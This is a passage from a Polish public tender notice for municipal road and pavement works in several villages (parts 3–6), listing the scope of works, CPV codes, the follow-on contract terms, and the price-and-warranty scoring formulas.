ustalone w drodze negocjacji z Wykonawcą.<br/>4)	Istotne postanowienia umowy o udzielenie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, inne niż określone w pkt 3, będą zgodne z istotnymi postanowieniami umowy zawartymi w umowie dla zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami:<br/>1) Cena – Pc - 60 pkt<br/>2) Okres gwarancji – Pg - 40 pkt<br/>Oferty oceniane będą punktowo. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty wg poniższego wzoru:<br/>P = Pc + Pg<br/>gdzie:<br/>P – łączna liczba punktów przyznanych badanej ofercie<br/>Pc – liczba punktów przyznanych ofercie w kryterium cena<br/>Pg – liczba punktów przyznanych ofercie w kryterium okres gwarancji<br/>Pc - w kryterium ceny, oferty będą oceniane wg poniższego wzoru:<br/>Pc = Cmin/Co * 60 pkt<br/>gdzie:<br/>Cmin- najniższa cena oferty brutto spośród wszystkich ocenianych ofert<br/>Co - cena brutto oferty ocenianej<br/>Maksymalna ilość punktów możliwych do uzyskania w kryterium cena wynosi 60.<br/>Pg – w kryterium okres gwarancji, oferty będą oceniane wg poniższego wzoru:<br/>Pg = Gbad/Gmax * 40 pkt<br/>gdzie:<br/>Gbad – Okres gwarancji na przedmiot zamówienia zaoferowany w ofercie badanej<br/>Gmax - najdłuższy zaoferowany okres gwarancji na przedmiot zamówienia spośród wszystkich badanych ofert<br/>Zamawiający wymaga, aby Wykonawca udzielił minimum 36 miesięcy okresu gwarancji liczonego od dnia podpisania protokołu odbioru końcowego robót budowlanych. Maksymalny oceniany przez Zamawiającego okres gwarancji wynosi 60 miesięcy. Za udzielenie minimalnej gwarancji 36 - miesięcznej przyznaje się 0 punktów. Jeżeli Wykonawca udzieli dłuższego niż maksymalny oczekiwany okres gwarancji. Zamawiający do oceny oferty przyjmie maksymalny oczekiwany okres gwarancji tj. 60 miesięcy, a do umowy przyjmie okres gwarancji wpisany w formularzu ofertowym. Jeżeli Wykonawca nie wskaże w ofercie okresu gwarancji, Zamawiający do oceny oferty i umowy przyjmie minimalny okres gwarancji tj. 36 m-cy. Jeżeli Wykonawca udzieli krótszego okresu gwarancji niż minimalny (36 mcy), to jego oferta zostanie odrzucona. Maksymalna ilość punktów możliwych do uzyskania w kryterium okres gwarancji wynosi 40.<br/>Zamawiający oceni i porówna jedynie te oferty, które zostaną określone jako zgodne z wymaganiami określonymi w niniejszej specyfikacji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia Części 3 jest wykonanie robót budowlanych w ramach zadania: Fundusz sołecki Olewin – Remont ulicy Granicznej w Sienicznie.<br/>Zakres prac Części 3 obejmuje w szczególności: <br/>- roboty przygotowawcze i rozbiórkowe z odwozem materiałów z rozbiórki wraz z utylizacją, <br/>- roboty ziemne,<br/>- profilowanie i zagęszczanie mechaniczne koryta,<br/>- wykonanie podbudowy z kruszywa kamiennego w układzie warstw: dolna 20,0 cm warstwa górna 10,0 cm, <br/>- ułożenie nawierzchni z betonu asfaltowego w układzie warstw: warstwa ścieralna 4,0 cm,<br/>- prace wykończeniowe obustronne pobocza o szer. 10 cm i prace porządkowe plantowanie terenu,<br/> - wykonanie robót towarzyszących tym pracom. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233252-0 - Roboty w zakresie nawierzchni ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">34922100-7 - Oznakowanie drogowe</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówienia z wolnej ręki, zgodnie z art. 214 ust. 1 pkt 7 ustawy Pzp (w okresie 3 lat od dnia udzielenia zamówienia podstawowego), dotychczasowemu Wykonawcy robót budowlanych. Przewidywane zamówienie będzie polegało na powtórzeniu podobnych robót budowlanych (wydłużeniu przebudowywanego odcinka drogi lub chodnika) jak w zamówieniu podstawowym, zgodnie z przedmiotem zamówienia podstawowego. Przewiduje się możliwość wykorzystania wszystkich rodzajów prac określonych w przedmiarze robót. Zamówienie podobne będzie obejmować max. 50 % zakresu rzeczowego zamówienia podstawowego<br/>Warunki udzielenia zamówienia podobnego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp:<br/>1)	Wykonawca wykonał należycie roboty budowlane objęte niniejszym postępowaniem , <br/>2)	Wykonawca zapewni wykonanie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w standardzie nie gorszym niż przyjęty do wykonania podstawowego,<br/>3)	Wysokość wynagrodzenia i termin wykonania zostaną ustalone w drodze negocjacji z Wykonawcą.<br/>4)	Istotne postanowienia umowy o udzielenie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, inne niż określone w pkt 3, będą zgodne z istotnymi postanowieniami umowy zawartymi w umowie dla zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami:<br/>1) Cena – Pc - 60 pkt<br/>2) Okres gwarancji – Pg - 40 pkt<br/>Oferty oceniane będą punktowo. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty wg poniższego wzoru:<br/>P = Pc + Pg<br/>gdzie:<br/>P – łączna liczba punktów przyznanych badanej ofercie<br/>Pc – liczba punktów przyznanych ofercie w kryterium cena<br/>Pg – liczba punktów przyznanych ofercie w kryterium okres gwarancji<br/>Pc - w kryterium ceny, oferty będą oceniane wg poniższego wzoru:<br/>Pc = Cmin/Co * 60 pkt<br/>gdzie:<br/>Cmin- najniższa cena oferty brutto spośród wszystkich ocenianych ofert<br/>Co - cena brutto oferty ocenianej<br/>Maksymalna ilość punktów możliwych do uzyskania w kryterium cena wynosi 60.<br/>Pg – w kryterium okres gwarancji, oferty będą oceniane wg poniższego wzoru:<br/>Pg = Gbad/Gmax * 40 pkt<br/>gdzie:<br/>Gbad – Okres gwarancji na przedmiot zamówienia zaoferowany w ofercie badanej<br/>Gmax - najdłuższy zaoferowany okres gwarancji na przedmiot zamówienia spośród wszystkich badanych ofert<br/>Zamawiający wymaga, aby Wykonawca udzielił minimum 36 miesięcy okresu gwarancji liczonego od dnia podpisania protokołu odbioru końcowego robót budowlanych. Maksymalny oceniany przez Zamawiającego okres gwarancji wynosi 60 miesięcy. Za udzielenie minimalnej gwarancji 36 - miesięcznej przyznaje się 0 punktów. Jeżeli Wykonawca udzieli dłuższego niż maksymalny oczekiwany okres gwarancji. Zamawiający do oceny oferty przyjmie maksymalny oczekiwany okres gwarancji tj. 60 miesięcy, a do umowy przyjmie okres gwarancji wpisany w formularzu ofertowym. Jeżeli Wykonawca nie wskaże w ofercie okresu gwarancji, Zamawiający do oceny oferty i umowy przyjmie minimalny okres gwarancji tj. 36 m-cy. Jeżeli Wykonawca udzieli krótszego okresu gwarancji niż minimalny (36 mcy), to jego oferta zostanie odrzucona. Maksymalna ilość punktów możliwych do uzyskania w kryterium okres gwarancji wynosi 40.<br/>Zamawiający oceni i porówna jedynie te oferty, które zostaną określone jako zgodne z wymaganiami określonymi w niniejszej specyfikacji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach zadania Remont drogi na działce nr 586 w Żuradzie.<br/>Zakres prac Części 4 obejmuje w szczególności: <br/>- roboty przygotowawcze,<br/>- roboty ziemne,<br/>- profilowanie i zagęszczanie mechaniczne koryta,<br/>- wykonanie odwodnienia,<br/>- wykonanie podbudowy z kruszywa kamiennego w układzie warstw dolna 15,0 cm warstwa górna 10,0 cm, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233252-0 - Roboty w zakresie nawierzchni ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">34922100-7 - Oznakowanie drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówienia z wolnej ręki, zgodnie z art. 214 ust. 1 pkt 7 ustawy Pzp (w okresie 3 lat od dnia udzielenia zamówienia podstawowego), dotychczasowemu Wykonawcy robót budowlanych. Przewidywane zamówienie będzie polegało na powtórzeniu podobnych robót budowlanych (wydłużeniu przebudowywanego odcinka drogi lub chodnika) jak w zamówieniu podstawowym, zgodnie z przedmiotem zamówienia podstawowego. Przewiduje się możliwość wykorzystania wszystkich rodzajów prac określonych w przedmiarze robót. Zamówienie podobne będzie obejmować max. 50 % zakresu rzeczowego zamówienia podstawowego<br/>Warunki udzielenia zamówienia podobnego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp:<br/>1)	Wykonawca wykonał należycie roboty budowlane objęte niniejszym postępowaniem , <br/>2)	Wykonawca zapewni wykonanie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w standardzie nie gorszym niż przyjęty do wykonania podstawowego,<br/>3)	Wysokość wynagrodzenia i termin wykonania zostaną ustalone w drodze negocjacji z Wykonawcą.<br/>4)	Istotne postanowienia umowy o udzielenie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, inne niż określone w pkt 3, będą zgodne z istotnymi postanowieniami umowy zawartymi w umowie dla zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami:<br/>1) Cena – Pc - 60 pkt<br/>2) Okres gwarancji – Pg - 40 pkt<br/>Oferty oceniane będą punktowo. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty wg poniższego wzoru:<br/>P = Pc + Pg<br/>gdzie:<br/>P – łączna liczba punktów przyznanych badanej ofercie<br/>Pc – liczba punktów przyznanych ofercie w kryterium cena<br/>Pg – liczba punktów przyznanych ofercie w kryterium okres gwarancji<br/>Pc - w kryterium ceny, oferty będą oceniane wg poniższego wzoru:<br/>Pc = Cmin/Co * 60 pkt<br/>gdzie:<br/>Cmin- najniższa cena oferty brutto spośród wszystkich ocenianych ofert<br/>Co - cena brutto oferty ocenianej<br/>Maksymalna ilość punktów możliwych do uzyskania w kryterium cena wynosi 60.<br/>Pg – w kryterium okres gwarancji, oferty będą oceniane wg poniższego wzoru:<br/>Pg = Gbad/Gmax * 40 pkt<br/>gdzie:<br/>Gbad – Okres gwarancji na przedmiot zamówienia zaoferowany w ofercie badanej<br/>Gmax - najdłuższy zaoferowany okres gwarancji na przedmiot zamówienia spośród wszystkich badanych ofert<br/>Zamawiający wymaga, aby Wykonawca udzielił minimum 36 miesięcy okresu gwarancji liczonego od dnia podpisania protokołu odbioru końcowego robót budowlanych. Maksymalny oceniany przez Zamawiającego okres gwarancji wynosi 60 miesięcy. Za udzielenie minimalnej gwarancji 36 - miesięcznej przyznaje się 0 punktów. Jeżeli Wykonawca udzieli dłuższego niż maksymalny oczekiwany okres gwarancji. Zamawiający do oceny oferty przyjmie maksymalny oczekiwany okres gwarancji tj. 60 miesięcy, a do umowy przyjmie okres gwarancji wpisany w formularzu ofertowym. Jeżeli Wykonawca nie wskaże w ofercie okresu gwarancji, Zamawiający do oceny oferty i umowy przyjmie minimalny okres gwarancji tj. 36 m-cy. Jeżeli Wykonawca udzieli krótszego okresu gwarancji niż minimalny (36 mcy), to jego oferta zostanie odrzucona. Maksymalna ilość punktów możliwych do uzyskania w kryterium okres gwarancji wynosi 40.<br/>Zamawiający oceni i porówna jedynie te oferty, które zostaną określone jako zgodne z wymaganiami określonymi w niniejszej specyfikacji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach zadania: Fundusz sołecki Troks – Wykonanie nakładki asfaltowej na drogach dojazdowych na działkach mienia gminnego.<br/>Zakres prac Części 5 obejmuje w szczególności: <br/>- roboty przygotowawcze,<br/>- roboty ziemne,<br/>- profilowanie i zagęszczanie mechaniczne koryta,<br/>- wykonanie podbudowy z kruszywa kamiennego,<br/>- ułożenie nawierzchni z betonu asfaltowego o grubości 6,0 cm do 8,0 cm ( warstwa wiążąca i ścieralna),<br/>- prace wykończeniowe wykonanie poboczy o szerokości do 25 cm z kruszywa o grubości po zagęszczeniu około 7 cm i porządkowe plantowanie terenu <br/>- wykonanie robót towarzyszących tym pracom </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">34922100-7 - Oznakowanie drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówienia z wolnej ręki, zgodnie z art. 214 ust. 1 pkt 7 ustawy Pzp (w okresie 3 lat od dnia udzielenia zamówienia podstawowego), dotychczasowemu Wykonawcy robót budowlanych. Przewidywane zamówienie będzie polegało na powtórzeniu podobnych robót budowlanych (wydłużeniu przebudowywanego odcinka drogi lub chodnika) jak w zamówieniu podstawowym, zgodnie z przedmiotem zamówienia podstawowego. Przewiduje się możliwość wykorzystania wszystkich rodzajów prac określonych w przedmiarze robót. Zamówienie podobne będzie obejmować max. 50 % zakresu rzeczowego zamówienia podstawowego<br/>Warunki udzielenia zamówienia podobnego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp:<br/>1)	Wykonawca wykonał należycie roboty budowlane objęte niniejszym postępowaniem , <br/>2)	Wykonawca zapewni wykonanie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w standardzie nie gorszym niż przyjęty do wykonania podstawowego,<br/>3)	Wysokość wynagrodzenia i termin wykonania zostaną ustalone w drodze negocjacji z Wykonawcą.<br/>4)	Istotne postanowienia umowy o udzielenie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, inne niż określone w pkt 3, będą zgodne z istotnymi postanowieniami umowy zawartymi w umowie dla zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami:<br/>1) Cena – Pc - 60 pkt<br/>2) Okres gwarancji – Pg - 40 pkt<br/>Oferty oceniane będą punktowo. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty wg poniższego wzoru:<br/>P = Pc + Pg<br/>gdzie:<br/>P – łączna liczba punktów przyznanych badanej ofercie<br/>Pc – liczba punktów przyznanych ofercie w kryterium cena<br/>Pg – liczba punktów przyznanych ofercie w kryterium okres gwarancji<br/>Pc - w kryterium ceny, oferty będą oceniane wg poniższego wzoru:<br/>Pc = Cmin/Co * 60 pkt<br/>gdzie:<br/>Cmin- najniższa cena oferty brutto spośród wszystkich ocenianych ofert<br/>Co - cena brutto oferty ocenianej<br/>Maksymalna ilość punktów możliwych do uzyskania w kryterium cena wynosi 60.<br/>Pg – w kryterium okres gwarancji, oferty będą oceniane wg poniższego wzoru:<br/>Pg = Gbad/Gmax * 40 pkt<br/>gdzie:<br/>Gbad – Okres gwarancji na przedmiot zamówienia zaoferowany w ofercie badanej<br/>Gmax - najdłuższy zaoferowany okres gwarancji na przedmiot zamówienia spośród wszystkich badanych ofert<br/>Zamawiający wymaga, aby Wykonawca udzielił minimum 36 miesięcy okresu gwarancji liczonego od dnia podpisania protokołu odbioru końcowego robót budowlanych. Maksymalny oceniany przez Zamawiającego okres gwarancji wynosi 60 miesięcy. Za udzielenie minimalnej gwarancji 36 - miesięcznej przyznaje się 0 punktów. Jeżeli Wykonawca udzieli dłuższego niż maksymalny oczekiwany okres gwarancji. Zamawiający do oceny oferty przyjmie maksymalny oczekiwany okres gwarancji tj. 60 miesięcy, a do umowy przyjmie okres gwarancji wpisany w formularzu ofertowym. Jeżeli Wykonawca nie wskaże w ofercie okresu gwarancji, Zamawiający do oceny oferty i umowy przyjmie minimalny okres gwarancji tj. 36 m-cy. Jeżeli Wykonawca udzieli krótszego okresu gwarancji niż minimalny (36 mcy), to jego oferta zostanie odrzucona. Maksymalna ilość punktów możliwych do uzyskania w kryterium okres gwarancji wynosi 40.<br/>Zamawiający oceni i porówna jedynie te oferty, które zostaną określone jako zgodne z wymaganiami określonymi w niniejszej specyfikacji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia Części 6 jest wykonanie robót budowlanych w ramach zadania: Fundusz sołecki Witeradów – Kontynuacja budowy chodnika od szkoły Podstawowej do pętli autobusowej w Witeradowie.<br/>Zakres prac Części 5 obejmuje w szczególności: <br/>- roboty przygotowawcze,<br/>- roboty ziemne,<br/>- profilowanie i zagęszczanie mechaniczne koryta,<br/>- wykonanie podbudowy z kruszywa kamiennego w układzie warstw,<br/>- ułożenie chodnika z kostki brukowej,<br/>- prace wykończeniowe i porządkowe, <br/>- wykonanie robót towarzyszących tym pracom </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233252-0 - Roboty w zakresie nawierzchni ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">34922100-7 - Oznakowanie drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówienia z wolnej ręki, zgodnie z art. 214 ust. 1 pkt 7 ustawy Pzp (w okresie 3 lat od dnia udzielenia zamówienia podstawowego), dotychczasowemu Wykonawcy robót budowlanych. Przewidywane zamówienie będzie polegało na powtórzeniu podobnych robót budowlanych (wydłużeniu przebudowywanego odcinka drogi lub chodnika) jak w zamówieniu podstawowym, zgodnie z przedmiotem zamówienia podstawowego. Przewiduje się możliwość wykorzystania wszystkich rodzajów prac określonych w przedmiarze robót. Zamówienie podobne będzie obejmować max. 50 % zakresu rzeczowego zamówienia podstawowego<br/>Warunki udzielenia zamówienia podobnego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp:<br/>1)	Wykonawca wykonał należycie roboty budowlane objęte niniejszym postępowaniem , <br/>2)	Wykonawca zapewni wykonanie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w standardzie nie gorszym niż przyjęty do wykonania podstawowego,<br/>3)	Wysokość wynagrodzenia i termin wykonania zostaną ustalone w drodze negocjacji z Wykonawcą.<br/>4)	Istotne postanowienia umowy o udzielenie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, inne niż określone w pkt 3, będą zgodne z istotnymi postanowieniami umowy zawartymi w umowie dla zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami:<br/>1) Cena – Pc - 60 pkt<br/>2) Okres gwarancji – Pg - 40 pkt<br/>Oferty oceniane będą punktowo. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty wg poniższego wzoru:<br/>P = Pc + Pg<br/>gdzie:<br/>P – łączna liczba punktów przyznanych badanej ofercie<br/>Pc – liczba punktów przyznanych ofercie w kryterium cena<br/>Pg – liczba punktów przyznanych ofercie w kryterium okres gwarancji<br/>Pc - w kryterium ceny, oferty będą oceniane wg poniższego wzoru:<br/>Pc = Cmin/Co * 60 pkt<br/>gdzie:<br/>Cmin- najniższa cena oferty brutto spośród wszystkich ocenianych ofert<br/>Co - cena brutto oferty ocenianej<br/>Maksymalna ilość punktów możliwych do uzyskania w kryterium cena wynosi 60.<br/>Pg – w kryterium okres gwarancji, oferty będą oceniane wg poniższego wzoru:<br/>Pg = Gbad/Gmax * 40 pkt<br/>gdzie:<br/>Gbad – Okres gwarancji na przedmiot zamówienia zaoferowany w ofercie badanej<br/>Gmax - najdłuższy zaoferowany okres gwarancji na przedmiot zamówienia spośród wszystkich badanych ofert<br/>Zamawiający wymaga, aby Wykonawca udzielił minimum 36 miesięcy okresu gwarancji liczonego od dnia podpisania protokołu odbioru końcowego robót budowlanych. Maksymalny oceniany przez Zamawiającego okres gwarancji wynosi 60 miesięcy. Za udzielenie minimalnej gwarancji 36 - miesięcznej przyznaje się 0 punktów. Jeżeli Wykonawca udzieli dłuższego niż maksymalny oczekiwany okres gwarancji. Zamawiający do oceny oferty przyjmie maksymalny oczekiwany okres gwarancji tj. 60 miesięcy, a do umowy przyjmie okres gwarancji wpisany w formularzu ofertowym. Jeżeli Wykonawca nie wskaże w ofercie okresu gwarancji, Zamawiający do oceny oferty i umowy przyjmie minimalny okres gwarancji tj. 36 m-cy. Jeżeli Wykonawca udzieli krótszego okresu gwarancji niż minimalny (36 mcy), to jego oferta zostanie odrzucona. Maksymalna ilość punktów możliwych do uzyskania w kryterium okres gwarancji wynosi 40.<br/>Zamawiający oceni i porówna jedynie te oferty, które zostaną określone jako zgodne z wymaganiami określonymi w niniejszej specyfikacji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: 